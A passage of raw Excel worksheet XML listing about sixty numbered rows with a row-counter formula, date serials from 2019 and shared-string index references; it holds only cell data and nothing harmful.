        <v>10945</v>
      </c>
      <c r="B10946">
        <v>945</v>
      </c>
      <c r="C10946" t="s">
        <v>19637</v>
      </c>
      <c r="D10946" s="1">
        <v>43711</v>
      </c>
      <c r="E10946" t="s">
        <v>19648</v>
      </c>
      <c r="F10946" t="s">
        <v>10021</v>
      </c>
      <c r="G10946" t="s">
        <v>20857</v>
      </c>
    </row>
    <row r="10947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10947">
        <f t="shared" ref="A10947:A11010" si="171">+ROW(A10946)</f>
        <v>10946</v>
      </c>
      <c r="B10947">
        <v>946</v>
      </c>
      <c r="C10947" t="s">
        <v>19637</v>
      </c>
      <c r="D10947" s="1">
        <v>43723</v>
      </c>
      <c r="E10947" t="s">
        <v>20220</v>
      </c>
      <c r="F10947" t="s">
        <v>10021</v>
      </c>
      <c r="G10947" t="s">
        <v>20858</v>
      </c>
    </row>
    <row r="10948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10948">
        <f t="shared" si="171"/>
        <v>10947</v>
      </c>
      <c r="B10948">
        <v>947</v>
      </c>
      <c r="C10948" t="s">
        <v>19637</v>
      </c>
      <c r="D10948" s="1">
        <v>43718</v>
      </c>
      <c r="F10948" t="s">
        <v>10526</v>
      </c>
      <c r="G10948" t="s">
        <v>20859</v>
      </c>
    </row>
    <row r="10949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10949">
        <f t="shared" si="171"/>
        <v>10948</v>
      </c>
      <c r="B10949">
        <v>948</v>
      </c>
      <c r="C10949" t="s">
        <v>19637</v>
      </c>
      <c r="D10949" s="1">
        <v>43727</v>
      </c>
      <c r="E10949" t="s">
        <v>19640</v>
      </c>
      <c r="F10949" t="s">
        <v>9975</v>
      </c>
      <c r="G10949" t="s">
        <v>20860</v>
      </c>
    </row>
    <row r="10950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10950">
        <f t="shared" si="171"/>
        <v>10949</v>
      </c>
      <c r="B10950">
        <v>949</v>
      </c>
      <c r="C10950" t="s">
        <v>19637</v>
      </c>
      <c r="D10950" s="1">
        <v>43720</v>
      </c>
      <c r="F10950" t="s">
        <v>10526</v>
      </c>
      <c r="G10950" t="s">
        <v>20861</v>
      </c>
    </row>
    <row r="10951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10951">
        <f t="shared" si="171"/>
        <v>10950</v>
      </c>
      <c r="B10951">
        <v>950</v>
      </c>
      <c r="C10951" t="s">
        <v>19637</v>
      </c>
      <c r="D10951" s="1">
        <v>43733</v>
      </c>
      <c r="E10951" t="s">
        <v>20862</v>
      </c>
      <c r="F10951" t="s">
        <v>10021</v>
      </c>
      <c r="G10951" t="s">
        <v>20863</v>
      </c>
    </row>
    <row r="10952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10952">
        <f t="shared" si="171"/>
        <v>10951</v>
      </c>
      <c r="B10952">
        <v>951</v>
      </c>
      <c r="C10952" t="s">
        <v>19637</v>
      </c>
      <c r="D10952" s="1">
        <v>43710</v>
      </c>
      <c r="E10952" t="s">
        <v>19849</v>
      </c>
      <c r="F10952" t="s">
        <v>10021</v>
      </c>
      <c r="G10952" t="s">
        <v>20864</v>
      </c>
    </row>
    <row r="10953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10953">
        <f t="shared" si="171"/>
        <v>10952</v>
      </c>
      <c r="B10953">
        <v>952</v>
      </c>
      <c r="C10953" t="s">
        <v>19637</v>
      </c>
      <c r="D10953" s="1">
        <v>43728</v>
      </c>
      <c r="E10953" t="s">
        <v>20865</v>
      </c>
      <c r="F10953" t="s">
        <v>9975</v>
      </c>
      <c r="G10953" t="s">
        <v>20866</v>
      </c>
    </row>
    <row r="10954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10954">
        <f t="shared" si="171"/>
        <v>10953</v>
      </c>
      <c r="B10954">
        <v>953</v>
      </c>
      <c r="C10954" t="s">
        <v>19637</v>
      </c>
      <c r="D10954" s="1">
        <v>43735</v>
      </c>
      <c r="E10954" t="s">
        <v>20867</v>
      </c>
      <c r="F10954" t="s">
        <v>10526</v>
      </c>
      <c r="G10954" t="s">
        <v>20868</v>
      </c>
    </row>
    <row r="10955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10955">
        <f t="shared" si="171"/>
        <v>10954</v>
      </c>
      <c r="B10955">
        <v>954</v>
      </c>
      <c r="C10955" t="s">
        <v>19637</v>
      </c>
      <c r="D10955" s="1">
        <v>43735</v>
      </c>
      <c r="E10955" t="s">
        <v>20869</v>
      </c>
      <c r="F10955" t="s">
        <v>10526</v>
      </c>
      <c r="G10955" t="s">
        <v>20870</v>
      </c>
    </row>
    <row r="10956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10956">
        <f t="shared" si="171"/>
        <v>10955</v>
      </c>
      <c r="B10956">
        <v>955</v>
      </c>
      <c r="C10956" t="s">
        <v>19637</v>
      </c>
      <c r="D10956" s="1">
        <v>43732</v>
      </c>
      <c r="E10956" t="s">
        <v>20871</v>
      </c>
      <c r="F10956" t="s">
        <v>9978</v>
      </c>
      <c r="G10956" t="s">
        <v>20872</v>
      </c>
    </row>
    <row r="10957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10957">
        <f t="shared" si="171"/>
        <v>10956</v>
      </c>
      <c r="B10957">
        <v>956</v>
      </c>
      <c r="C10957" t="s">
        <v>19637</v>
      </c>
      <c r="D10957" s="1">
        <v>43724</v>
      </c>
      <c r="E10957" t="s">
        <v>20873</v>
      </c>
      <c r="F10957" t="s">
        <v>10526</v>
      </c>
      <c r="G10957" t="s">
        <v>20874</v>
      </c>
    </row>
    <row r="10958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10958">
        <f t="shared" si="171"/>
        <v>10957</v>
      </c>
      <c r="B10958">
        <v>957</v>
      </c>
      <c r="C10958" t="s">
        <v>19637</v>
      </c>
      <c r="D10958" s="1">
        <v>43720</v>
      </c>
      <c r="E10958" t="s">
        <v>19879</v>
      </c>
      <c r="F10958" t="s">
        <v>10021</v>
      </c>
      <c r="G10958" t="s">
        <v>20875</v>
      </c>
    </row>
    <row r="10959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10959">
        <f t="shared" si="171"/>
        <v>10958</v>
      </c>
      <c r="B10959">
        <v>958</v>
      </c>
      <c r="C10959" t="s">
        <v>19637</v>
      </c>
      <c r="D10959" s="1">
        <v>43718</v>
      </c>
      <c r="E10959" t="s">
        <v>20876</v>
      </c>
      <c r="F10959" t="s">
        <v>9978</v>
      </c>
      <c r="G10959" t="s">
        <v>20877</v>
      </c>
    </row>
    <row r="10960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10960">
        <f t="shared" si="171"/>
        <v>10959</v>
      </c>
      <c r="B10960">
        <v>959</v>
      </c>
      <c r="C10960" t="s">
        <v>19637</v>
      </c>
      <c r="D10960" s="1">
        <v>43719</v>
      </c>
      <c r="E10960" t="s">
        <v>20878</v>
      </c>
      <c r="F10960" t="s">
        <v>10526</v>
      </c>
      <c r="G10960" t="s">
        <v>20879</v>
      </c>
    </row>
    <row r="10961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10961">
        <f t="shared" si="171"/>
        <v>10960</v>
      </c>
      <c r="B10961">
        <v>960</v>
      </c>
      <c r="C10961" t="s">
        <v>19637</v>
      </c>
      <c r="D10961" s="1">
        <v>43730</v>
      </c>
      <c r="E10961" t="s">
        <v>19640</v>
      </c>
      <c r="F10961" t="s">
        <v>9975</v>
      </c>
      <c r="G10961" t="s">
        <v>20880</v>
      </c>
    </row>
    <row r="10962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10962">
        <f t="shared" si="171"/>
        <v>10961</v>
      </c>
      <c r="B10962">
        <v>961</v>
      </c>
      <c r="C10962" t="s">
        <v>19637</v>
      </c>
      <c r="D10962" s="1">
        <v>43730</v>
      </c>
      <c r="F10962" t="s">
        <v>10526</v>
      </c>
      <c r="G10962" t="s">
        <v>20881</v>
      </c>
    </row>
    <row r="10963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10963">
        <f t="shared" si="171"/>
        <v>10962</v>
      </c>
      <c r="B10963">
        <v>962</v>
      </c>
      <c r="C10963" t="s">
        <v>19637</v>
      </c>
      <c r="D10963" s="1">
        <v>43738</v>
      </c>
      <c r="E10963" t="s">
        <v>20882</v>
      </c>
      <c r="F10963" t="s">
        <v>10021</v>
      </c>
      <c r="G10963" t="s">
        <v>20883</v>
      </c>
    </row>
    <row r="10964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10964">
        <f t="shared" si="171"/>
        <v>10963</v>
      </c>
      <c r="B10964">
        <v>963</v>
      </c>
      <c r="C10964" t="s">
        <v>19637</v>
      </c>
      <c r="D10964" s="1">
        <v>43734</v>
      </c>
      <c r="E10964" t="s">
        <v>19690</v>
      </c>
      <c r="F10964" t="s">
        <v>9978</v>
      </c>
      <c r="G10964" t="s">
        <v>20884</v>
      </c>
    </row>
    <row r="10965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10965">
        <f t="shared" si="171"/>
        <v>10964</v>
      </c>
      <c r="B10965">
        <v>964</v>
      </c>
      <c r="C10965" t="s">
        <v>19637</v>
      </c>
      <c r="D10965" s="1">
        <v>43714</v>
      </c>
      <c r="F10965" t="s">
        <v>10526</v>
      </c>
      <c r="G10965" t="s">
        <v>20885</v>
      </c>
    </row>
    <row r="10966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10966">
        <f t="shared" si="171"/>
        <v>10965</v>
      </c>
      <c r="B10966">
        <v>965</v>
      </c>
      <c r="C10966" t="s">
        <v>19637</v>
      </c>
      <c r="D10966" s="1">
        <v>43735</v>
      </c>
      <c r="E10966" t="s">
        <v>20886</v>
      </c>
      <c r="F10966" t="s">
        <v>10526</v>
      </c>
      <c r="G10966" t="s">
        <v>20887</v>
      </c>
    </row>
    <row r="10967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10967">
        <f t="shared" si="171"/>
        <v>10966</v>
      </c>
      <c r="B10967">
        <v>966</v>
      </c>
      <c r="C10967" t="s">
        <v>19637</v>
      </c>
      <c r="D10967" s="1">
        <v>43725</v>
      </c>
      <c r="E10967" t="s">
        <v>19701</v>
      </c>
      <c r="F10967" t="s">
        <v>10021</v>
      </c>
      <c r="G10967" t="s">
        <v>20888</v>
      </c>
    </row>
    <row r="10968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10968">
        <f t="shared" si="171"/>
        <v>10967</v>
      </c>
      <c r="B10968">
        <v>967</v>
      </c>
      <c r="C10968" t="s">
        <v>19637</v>
      </c>
      <c r="D10968" s="1">
        <v>43712</v>
      </c>
      <c r="E10968" t="s">
        <v>20889</v>
      </c>
      <c r="F10968" t="s">
        <v>9978</v>
      </c>
      <c r="G10968" t="s">
        <v>20890</v>
      </c>
    </row>
    <row r="10969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10969">
        <f t="shared" si="171"/>
        <v>10968</v>
      </c>
      <c r="B10969">
        <v>968</v>
      </c>
      <c r="C10969" t="s">
        <v>19637</v>
      </c>
      <c r="D10969" s="1">
        <v>43735</v>
      </c>
      <c r="E10969" t="s">
        <v>20891</v>
      </c>
      <c r="F10969" t="s">
        <v>10021</v>
      </c>
      <c r="G10969" t="s">
        <v>20892</v>
      </c>
    </row>
    <row r="10970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10970">
        <f t="shared" si="171"/>
        <v>10969</v>
      </c>
      <c r="B10970">
        <v>969</v>
      </c>
      <c r="C10970" t="s">
        <v>19637</v>
      </c>
      <c r="D10970" s="1">
        <v>43736</v>
      </c>
      <c r="E10970" t="s">
        <v>19650</v>
      </c>
      <c r="F10970" t="s">
        <v>10021</v>
      </c>
      <c r="G10970" t="s">
        <v>20893</v>
      </c>
    </row>
    <row r="10971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10971">
        <f t="shared" si="171"/>
        <v>10970</v>
      </c>
      <c r="B10971">
        <v>970</v>
      </c>
      <c r="C10971" t="s">
        <v>19637</v>
      </c>
      <c r="D10971" s="1">
        <v>43728</v>
      </c>
      <c r="E10971" t="s">
        <v>20385</v>
      </c>
      <c r="F10971" t="s">
        <v>9978</v>
      </c>
      <c r="G10971" t="s">
        <v>20894</v>
      </c>
    </row>
    <row r="10972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10972">
        <f t="shared" si="171"/>
        <v>10971</v>
      </c>
      <c r="B10972">
        <v>971</v>
      </c>
      <c r="C10972" t="s">
        <v>19637</v>
      </c>
      <c r="D10972" s="1">
        <v>43721</v>
      </c>
      <c r="E10972" t="s">
        <v>20895</v>
      </c>
      <c r="F10972" t="s">
        <v>10526</v>
      </c>
      <c r="G10972" t="s">
        <v>20896</v>
      </c>
    </row>
    <row r="10973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10973">
        <f t="shared" si="171"/>
        <v>10972</v>
      </c>
      <c r="B10973">
        <v>972</v>
      </c>
      <c r="C10973" t="s">
        <v>19637</v>
      </c>
      <c r="D10973" s="1">
        <v>43731</v>
      </c>
      <c r="E10973" t="s">
        <v>19750</v>
      </c>
      <c r="F10973" t="s">
        <v>9978</v>
      </c>
      <c r="G10973" t="s">
        <v>20897</v>
      </c>
    </row>
    <row r="10974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10974">
        <f t="shared" si="171"/>
        <v>10973</v>
      </c>
      <c r="B10974">
        <v>973</v>
      </c>
      <c r="C10974" t="s">
        <v>19637</v>
      </c>
      <c r="D10974" s="1">
        <v>43732</v>
      </c>
      <c r="E10974" t="s">
        <v>19879</v>
      </c>
      <c r="F10974" t="s">
        <v>10021</v>
      </c>
      <c r="G10974" t="s">
        <v>20898</v>
      </c>
    </row>
    <row r="10975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10975">
        <f t="shared" si="171"/>
        <v>10974</v>
      </c>
      <c r="B10975">
        <v>974</v>
      </c>
      <c r="C10975" t="s">
        <v>19637</v>
      </c>
      <c r="D10975" s="1">
        <v>43727</v>
      </c>
      <c r="E10975" t="s">
        <v>19717</v>
      </c>
      <c r="F10975" t="s">
        <v>10526</v>
      </c>
      <c r="G10975" t="s">
        <v>20899</v>
      </c>
    </row>
    <row r="10976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10976">
        <f t="shared" si="171"/>
        <v>10975</v>
      </c>
      <c r="B10976">
        <v>975</v>
      </c>
      <c r="C10976" t="s">
        <v>19637</v>
      </c>
      <c r="D10976" s="1">
        <v>43728</v>
      </c>
      <c r="E10976" t="s">
        <v>19781</v>
      </c>
      <c r="F10976" t="s">
        <v>10526</v>
      </c>
      <c r="G10976" t="s">
        <v>20900</v>
      </c>
    </row>
    <row r="10977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10977">
        <f t="shared" si="171"/>
        <v>10976</v>
      </c>
      <c r="B10977">
        <v>976</v>
      </c>
      <c r="C10977" t="s">
        <v>19637</v>
      </c>
      <c r="D10977" s="1">
        <v>43732</v>
      </c>
      <c r="E10977" t="s">
        <v>19643</v>
      </c>
      <c r="F10977" t="s">
        <v>10021</v>
      </c>
      <c r="G10977" t="s">
        <v>20901</v>
      </c>
    </row>
    <row r="10978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10978">
        <f t="shared" si="171"/>
        <v>10977</v>
      </c>
      <c r="B10978">
        <v>977</v>
      </c>
      <c r="C10978" t="s">
        <v>19637</v>
      </c>
      <c r="D10978" s="1">
        <v>43725</v>
      </c>
      <c r="E10978" t="s">
        <v>19640</v>
      </c>
      <c r="F10978" t="s">
        <v>10021</v>
      </c>
      <c r="G10978" t="s">
        <v>20902</v>
      </c>
    </row>
    <row r="10979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10979">
        <f t="shared" si="171"/>
        <v>10978</v>
      </c>
      <c r="B10979">
        <v>978</v>
      </c>
      <c r="C10979" t="s">
        <v>19637</v>
      </c>
      <c r="D10979" s="1">
        <v>43719</v>
      </c>
      <c r="E10979" t="s">
        <v>20903</v>
      </c>
      <c r="F10979" t="s">
        <v>9978</v>
      </c>
      <c r="G10979" t="s">
        <v>20904</v>
      </c>
    </row>
    <row r="10980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10980">
        <f t="shared" si="171"/>
        <v>10979</v>
      </c>
      <c r="B10980">
        <v>979</v>
      </c>
      <c r="C10980" t="s">
        <v>19637</v>
      </c>
      <c r="D10980" s="1">
        <v>43712</v>
      </c>
      <c r="E10980" t="s">
        <v>20532</v>
      </c>
      <c r="F10980" t="s">
        <v>10021</v>
      </c>
      <c r="G10980" t="s">
        <v>20905</v>
      </c>
    </row>
    <row r="10981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10981">
        <f t="shared" si="171"/>
        <v>10980</v>
      </c>
      <c r="B10981">
        <v>980</v>
      </c>
      <c r="C10981" t="s">
        <v>19637</v>
      </c>
      <c r="D10981" s="1">
        <v>43725</v>
      </c>
      <c r="E10981" t="s">
        <v>19640</v>
      </c>
      <c r="F10981" t="s">
        <v>10021</v>
      </c>
      <c r="G10981" t="s">
        <v>20906</v>
      </c>
    </row>
    <row r="10982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10982">
        <f t="shared" si="171"/>
        <v>10981</v>
      </c>
      <c r="B10982">
        <v>981</v>
      </c>
      <c r="C10982" t="s">
        <v>19637</v>
      </c>
      <c r="D10982" s="1">
        <v>43731</v>
      </c>
      <c r="E10982" t="s">
        <v>19640</v>
      </c>
      <c r="F10982" t="s">
        <v>9975</v>
      </c>
      <c r="G10982" t="s">
        <v>20907</v>
      </c>
    </row>
    <row r="10983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10983">
        <f t="shared" si="171"/>
        <v>10982</v>
      </c>
      <c r="B10983">
        <v>982</v>
      </c>
      <c r="C10983" t="s">
        <v>19637</v>
      </c>
      <c r="D10983" s="1">
        <v>43724</v>
      </c>
      <c r="E10983" t="s">
        <v>20908</v>
      </c>
      <c r="F10983" t="s">
        <v>10526</v>
      </c>
      <c r="G10983" t="s">
        <v>20909</v>
      </c>
    </row>
    <row r="10984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10984">
        <f t="shared" si="171"/>
        <v>10983</v>
      </c>
      <c r="B10984">
        <v>983</v>
      </c>
      <c r="C10984" t="s">
        <v>19637</v>
      </c>
      <c r="D10984" s="1">
        <v>43734</v>
      </c>
      <c r="E10984" t="s">
        <v>20910</v>
      </c>
      <c r="F10984" t="s">
        <v>10526</v>
      </c>
      <c r="G10984" t="s">
        <v>20911</v>
      </c>
    </row>
    <row r="10985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10985">
        <f t="shared" si="171"/>
        <v>10984</v>
      </c>
      <c r="B10985">
        <v>984</v>
      </c>
      <c r="C10985" t="s">
        <v>19637</v>
      </c>
      <c r="D10985" s="1">
        <v>43729</v>
      </c>
      <c r="E10985" t="s">
        <v>19680</v>
      </c>
      <c r="F10985" t="s">
        <v>10021</v>
      </c>
      <c r="G10985" t="s">
        <v>20912</v>
      </c>
    </row>
    <row r="10986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10986">
        <f t="shared" si="171"/>
        <v>10985</v>
      </c>
      <c r="B10986">
        <v>985</v>
      </c>
      <c r="C10986" t="s">
        <v>19637</v>
      </c>
      <c r="D10986" s="1">
        <v>43729</v>
      </c>
      <c r="F10986" t="s">
        <v>10526</v>
      </c>
      <c r="G10986" t="s">
        <v>20913</v>
      </c>
    </row>
    <row r="10987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10987">
        <f t="shared" si="171"/>
        <v>10986</v>
      </c>
      <c r="B10987">
        <v>986</v>
      </c>
      <c r="C10987" t="s">
        <v>19637</v>
      </c>
      <c r="D10987" s="1">
        <v>43734</v>
      </c>
      <c r="F10987" t="s">
        <v>10526</v>
      </c>
      <c r="G10987" t="s">
        <v>20914</v>
      </c>
    </row>
    <row r="10988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10988">
        <f t="shared" si="171"/>
        <v>10987</v>
      </c>
      <c r="B10988">
        <v>987</v>
      </c>
      <c r="C10988" t="s">
        <v>19637</v>
      </c>
      <c r="D10988" s="1">
        <v>43721</v>
      </c>
      <c r="E10988" t="s">
        <v>19952</v>
      </c>
      <c r="F10988" t="s">
        <v>9978</v>
      </c>
      <c r="G10988" t="s">
        <v>20915</v>
      </c>
    </row>
    <row r="10989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10989">
        <f t="shared" si="171"/>
        <v>10988</v>
      </c>
      <c r="B10989">
        <v>988</v>
      </c>
      <c r="C10989" t="s">
        <v>19637</v>
      </c>
      <c r="D10989" s="1">
        <v>43730</v>
      </c>
      <c r="E10989" t="s">
        <v>19640</v>
      </c>
      <c r="F10989" t="s">
        <v>9975</v>
      </c>
      <c r="G10989" t="s">
        <v>20916</v>
      </c>
    </row>
    <row r="10990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10990">
        <f t="shared" si="171"/>
        <v>10989</v>
      </c>
      <c r="B10990">
        <v>989</v>
      </c>
      <c r="C10990" t="s">
        <v>19637</v>
      </c>
      <c r="D10990" s="1">
        <v>43713</v>
      </c>
      <c r="E10990" t="s">
        <v>20525</v>
      </c>
      <c r="F10990" t="s">
        <v>10021</v>
      </c>
      <c r="G10990" t="s">
        <v>20917</v>
      </c>
    </row>
    <row r="10991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10991">
        <f t="shared" si="171"/>
        <v>10990</v>
      </c>
      <c r="B10991">
        <v>990</v>
      </c>
      <c r="C10991" t="s">
        <v>19637</v>
      </c>
      <c r="D10991" s="1">
        <v>43717</v>
      </c>
      <c r="E10991" t="s">
        <v>19640</v>
      </c>
      <c r="F10991" t="s">
        <v>10021</v>
      </c>
      <c r="G10991" t="s">
        <v>20918</v>
      </c>
    </row>
    <row r="10992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10992">
        <f t="shared" si="171"/>
        <v>10991</v>
      </c>
      <c r="B10992">
        <v>991</v>
      </c>
      <c r="C10992" t="s">
        <v>19637</v>
      </c>
      <c r="D10992" s="1">
        <v>43732</v>
      </c>
      <c r="E10992" t="s">
        <v>19690</v>
      </c>
      <c r="F10992" t="s">
        <v>9978</v>
      </c>
      <c r="G10992" t="s">
        <v>20919</v>
      </c>
    </row>
    <row r="10993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10993">
        <f t="shared" si="171"/>
        <v>10992</v>
      </c>
      <c r="B10993">
        <v>992</v>
      </c>
      <c r="C10993" t="s">
        <v>19637</v>
      </c>
      <c r="D10993" s="1">
        <v>43709</v>
      </c>
      <c r="E10993" t="s">
        <v>19640</v>
      </c>
      <c r="F10993" t="s">
        <v>9975</v>
      </c>
      <c r="G10993" t="s">
        <v>20920</v>
      </c>
    </row>
    <row r="10994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10994">
        <f t="shared" si="171"/>
        <v>10993</v>
      </c>
      <c r="B10994">
        <v>993</v>
      </c>
      <c r="C10994" t="s">
        <v>19637</v>
      </c>
      <c r="D10994" s="1">
        <v>43713</v>
      </c>
      <c r="E10994" t="s">
        <v>20700</v>
      </c>
      <c r="F10994" t="s">
        <v>10021</v>
      </c>
      <c r="G10994" t="s">
        <v>20921</v>
      </c>
    </row>
    <row r="10995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10995">
        <f t="shared" si="171"/>
        <v>10994</v>
      </c>
      <c r="B10995">
        <v>994</v>
      </c>
      <c r="C10995" t="s">
        <v>19637</v>
      </c>
      <c r="D10995" s="1">
        <v>43724</v>
      </c>
      <c r="E10995" t="s">
        <v>20922</v>
      </c>
      <c r="F10995" t="s">
        <v>10526</v>
      </c>
      <c r="G10995" t="s">
        <v>20923</v>
      </c>
    </row>
    <row r="10996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10996">
        <f t="shared" si="171"/>
        <v>10995</v>
      </c>
      <c r="B10996">
        <v>995</v>
      </c>
      <c r="C10996" t="s">
        <v>19637</v>
      </c>
      <c r="D10996" s="1">
        <v>43722</v>
      </c>
      <c r="E10996" t="s">
        <v>19640</v>
      </c>
      <c r="F10996" t="s">
        <v>10021</v>
      </c>
      <c r="G10996" t="s">
        <v>20924</v>
      </c>
    </row>
    <row r="10997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10997">
        <f t="shared" si="171"/>
        <v>10996</v>
      </c>
      <c r="B10997">
        <v>996</v>
      </c>
      <c r="C10997" t="s">
        <v>19637</v>
      </c>
      <c r="D10997" s="1">
        <v>43721</v>
      </c>
      <c r="E10997" t="s">
        <v>20925</v>
      </c>
      <c r="F10997" t="s">
        <v>10526</v>
      </c>
      <c r="G10997" t="s">
        <v>20926</v>
      </c>
    </row>
    <row r="10998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10998">
        <f t="shared" si="171"/>
        <v>10997</v>
      </c>
      <c r="B10998">
        <v>997</v>
      </c>
      <c r="C10998" t="s">
        <v>19637</v>
      </c>
      <c r="D10998" s="1">
        <v>43737</v>
      </c>
      <c r="E10998" t="s">
        <v>19680</v>
      </c>
      <c r="F10998" t="s">
        <v>10021</v>
      </c>
      <c r="G10998" t="s">
        <v>20927</v>
      </c>
    </row>
    <row r="10999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10999">
        <f t="shared" si="171"/>
        <v>10998</v>
      </c>
      <c r="B10999">
        <v>998</v>
      </c>
      <c r="C10999" t="s">
        <v>19637</v>
      </c>
      <c r="D10999" s="1">
        <v>43718</v>
      </c>
      <c r="F10999" t="s">
        <v>9978</v>
      </c>
      <c r="G10999" t="s">
        <v>20928</v>
      </c>
    </row>
    <row r="11000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11000">
        <f t="shared" si="171"/>
        <v>10999</v>
      </c>
      <c r="B11000">
        <v>999</v>
      </c>
      <c r="C11000" t="s">
        <v>19637</v>
      </c>
      <c r="D11000" s="1">
        <v>43717</v>
      </c>
      <c r="E11000" t="s">
        <v>20929</v>
      </c>
      <c r="F11000" t="s">
        <v>10526</v>
      </c>
      <c r="G11000" t="s">
        <v>20930</v>
      </c>
    </row>
    <row r="11001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11001">
        <f t="shared" si="171"/>
        <v>11000</v>
      </c>
      <c r="B11001">
        <v>1000</v>
      </c>
      <c r="C11001" t="s">
        <v>19637</v>
      </c>
      <c r="D11001" s="1">
        <v>43727</v>
      </c>
      <c r="E11001" t="s">
        <v>19640</v>
      </c>
      <c r="F11001" t="s">
        <v>10021</v>
      </c>
      <c r="G11001" t="s">
        <v>20931</v>
      </c>
    </row>
    <row r="11002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11002">
        <f t="shared" si="171"/>
        <v>11001</v>
      </c>
      <c r="B11002">
        <v>1001</v>
      </c>
      <c r="C11002" t="s">
        <v>19637</v>
      </c>
      <c r="D11002" s="1">
        <v>43721</v>
      </c>
      <c r="E11002" t="s">
        <v>19741</v>
      </c>
      <c r="F11002" t="s">
        <v>9975</v>
      </c>
      <c r="G11002" t="s">
        <v>20932</v>
      </c>
    </row>
    <row r="11003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11003">
        <f t="shared" si="171"/>
        <v>11002</v>
      </c>
      <c r="B11003">
        <v>1002</v>
      </c>
      <c r="C11003" t="s">
        <v>19637</v>
      </c>
      <c r="D11003" s="1">
        <v>43725</v>
      </c>
      <c r="E11003" t="s">
        <v>19663</v>
      </c>
      <c r="F11003" t="s">
        <v>9975</v>
      </c>
      <c r="G11003" t="s">
        <v>20933</v>
      </c>
    </row>
    <row r="11004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11004">
        <f t="shared" si="171"/>
        <v>11003</v>
      </c>
      <c r="B11004">
        <v>1003</v>
      </c>
      <c r="C11004" t="s">
        <v>19637</v>
      </c>
      <c r="D11004" s="1">
        <v>43716</v>
      </c>
      <c r="E11004" t="s">
        <v>19690</v>
      </c>
      <c r="F11004" t="s">
        <v>9978</v>
      </c>
      <c r="G11004" t="s">
        <v>20934</v>
      </c>
    </row>
    <row r="11005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11005">
        <f t="shared" si="171"/>
        <v>11004</v>
      </c>
      <c r="B11005">
        <v>1004</v>
      </c>
      <c r="C11005" t="s">
        <v>19637</v>
      </c>
      <c r="D11005" s="1">
        <v>43718</v>
      </c>
      <c r="F11005" t="s">
        <v>10021</v>
      </c>
      <c r="G11005" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="11006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11006">
        <f t="shared" si="171"/>
        <v>11005</v>
      </c>
      <c r="B11006">
        <v>1005</v>
      </c>
      <c r="C11006" t="s">
        <v>19637</v>
      </c>
      <c r="D11006" s="1">
        <v>43731</v>
      </c>
      <c r="E11006" t="s">
        <v>19643</v>
      </c>
      <c r="F11006" t="s">
        <v>10021</v>
      </c>
      <c r="G11006" t="s">
        <v>20935</v>
      </c>
    </row>
    <row r="11007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11007">
        <f t="shared" si="171"/>
        <v>11006</v>
      </c>
      <c r="B11007">
        <v>1006</v>
      </c>
      <c r="C11007" t="s">
        <v>19637</v>
      </c>
      <c r="D11007" s="1">
        <v>43730</v>
      </c>
      <c r="E11007" t="s">
        <v>19640</v>
      </c>
      <c r="F11007" t="s">
        <v>9975</v>
      </c>
      <c r="G11007" t="s">
        <v>20936</v>
      </c>
    </row>
    <row r="11008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11008">
        <f t="shared" si="171"/>
        <v>11007</v>
